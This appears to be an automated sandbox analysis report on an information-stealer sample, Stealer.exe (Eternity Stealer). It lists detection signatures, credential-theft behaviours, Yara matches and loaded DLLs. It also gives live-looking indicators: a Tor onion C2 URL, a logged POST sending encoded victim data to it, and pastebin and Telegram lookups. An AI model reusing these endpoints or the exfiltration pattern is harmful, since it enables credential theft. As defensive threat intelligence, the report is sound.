Windows Analysis Report
Stealer.exe

Overview

General Information

Sample name: Stealer.exe
Analysis ID: 1417452
MD5: 495f88115eabed181e30727f2d2363d3
SHA1: 59cd87a7e30926fc7c51a921b78216119f9d4f1c
SHA256: cfef836fa4515f5371b8a30300098bdb03d4c91b123f0a35252757bc73b388f2
Infos:

Detection

Eternity Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected Eternity Stealer
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Deletes itself after installation
Found Tor onion address
Installs new ROOT certificates
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Self deletion via cmd or bat file
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Stealer.exe Avira: detected
Antivirus detection for URL or domain
Source: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: Stealer.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Stealer.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
Source: unknown DNS query: name: pastebin.com
Found Tor onion address
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM=&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw==&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg==&t=MzI3
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 9200
Source: unknown Network traffic detected: HTTP traffic on port 9200 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 9200 -> 49166
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1
Yara detected Generic Downloader
Source: Yara match File source: Stealer.exe, type: SAMPLE
Source: Yara match File source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.166.166.142:9200
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/X2Ddjiv0 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 110240Expect: 100-continueConnection: Keep-AliveData Raw: Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 172.67.34.170 172.67.34.170
Source: Joe Sandbox View IP Address: 172.67.34.170 172.67.34.170
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
May check the online IP address of the machine
Source: C:\Users\user\Desktop\Stealer.exe DNS query: name: ip-api.com
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: unknown TCP traffic detected without corresponding DNS query: 188.166.166.142
Source: global traffic HTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /raw/X2Ddjiv0 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: ip-api.com
Source: unknown HTTP traffic detected: POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 110240Expect: 100-continueConnection: Keep-AliveData Raw: Data Ascii:
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF43000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pastebin.comp
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://t.me
Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://t.mep
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Stealer.exe String found in binary or memory: https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/X2Ddjiv0
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/X2Ddjiv0p
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/cription
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me
Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/tor_proxies
Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/tor_proxiesp
Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: Stealer.exe, qq16.cs .Net Code: MakeScreenshot

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Stealer.exe, type: SAMPLE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTR Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DB2C2D 0_2_000007FE93DB2C2D
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DA3BF5 0_2_000007FE93DA3BF5
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D8CA06 0_2_000007FE93D8CA06
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D998ED 0_2_000007FE93D998ED
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DB0DAA 0_2_000007FE93DB0DAA
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DAE211 0_2_000007FE93DAE211
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D961B0 0_2_000007FE93D961B0
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D940D5 0_2_000007FE93D940D5
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DA4794 0_2_000007FE93DA4794
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93DA2784 0_2_000007FE93DA2784
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D8D7B2 0_2_000007FE93D8D7B2
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D856F1 0_2_000007FE93D856F1
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D876F0 0_2_000007FE93D876F0
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D88568 0_2_000007FE93D88568
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D81008 0_2_000007FE93D81008
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D81030 0_2_000007FE93D81030
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D81028 0_2_000007FE93D81028
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D81020 0_2_000007FE93D81020
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D81070 0_2_000007FE93D81070
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D81068 0_2_000007FE93D81068
Source: C:\Users\user\Desktop\Stealer.exe Code function: 0_2_000007FE93D8C509 0_2_000007FE93D8C509
Sample file is different than original file name gathered from version info
Source: Stealer.exe, 00000000.00000000.334000781.0000000000B26000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
Source: Stealer.exe, 00000000.00000002.466352660.000000000035D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Stealer.exe
Source: Stealer.exe Binary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: wbemcomn2.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Stealer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: credui.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: odbc32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpqec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: qutil.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ws2help.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nci.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: devrtl.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: napmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: certcli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ndfapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wdi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanutil.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pcollab.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
